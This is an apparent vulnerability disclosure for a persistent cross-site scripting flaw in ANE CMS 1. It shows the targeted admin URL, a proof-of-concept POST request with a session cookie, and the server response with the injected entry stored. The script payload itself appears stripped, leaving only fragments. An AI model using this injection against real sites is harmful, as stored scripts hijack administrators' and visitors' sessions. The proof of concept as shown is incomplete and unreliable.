======================================================================= ANE CMS 1 Persistent XSS Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software ANE CMS 1 # Site p4ge http://demo.anecms.com/index.php # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://server/acp/index.php?p=cfg&m=links In ADD LINKS Field provide the malicious script to store in the Database. That is-
"> ">
======================================================================= Request - ======================================================================= POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1 Host: demo.anecms.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://demo.anecms.com/acp/index.php?p=cfg&m=links Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9 Content-Type: application/x-www-form-urlencoded Content-Length: 41 name=">&link=">&type=1&view=0 ======================================================================= ======================================================================= Response- ======================================================================= HTTP/1.1 200 OK Date: Thu, 11 Mar 2010 06:59:03 GMT Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset: utf-8 Content-Length: 7771  Transdmin Light

Administration

Configuration » Links


Aggiungi un nuovo Link

Barra Links Menu Links

Name Link Options
Bar Links
Home index.php Modify Delete Move Down
Blog blog Modify Delete Move up Move Down
Registrati register Modify Delete Move up Move Down
ACP acp Modify Delete Move up Move Down
Widgets index.php?modifywidgets Modify Delete Move up Move Down
master master.asp Modify Delete Move up Move Down
"> "> Modify Delete Move up Move Down
Menu Links
home index.php Modify Delete Move up Move Down
Blog blog Modify Delete Move up Move Down

======================================================================= After completion Just Refres the page and the script get executed again and again. #If you have any questions, comments, or concerns, feel free to contact me.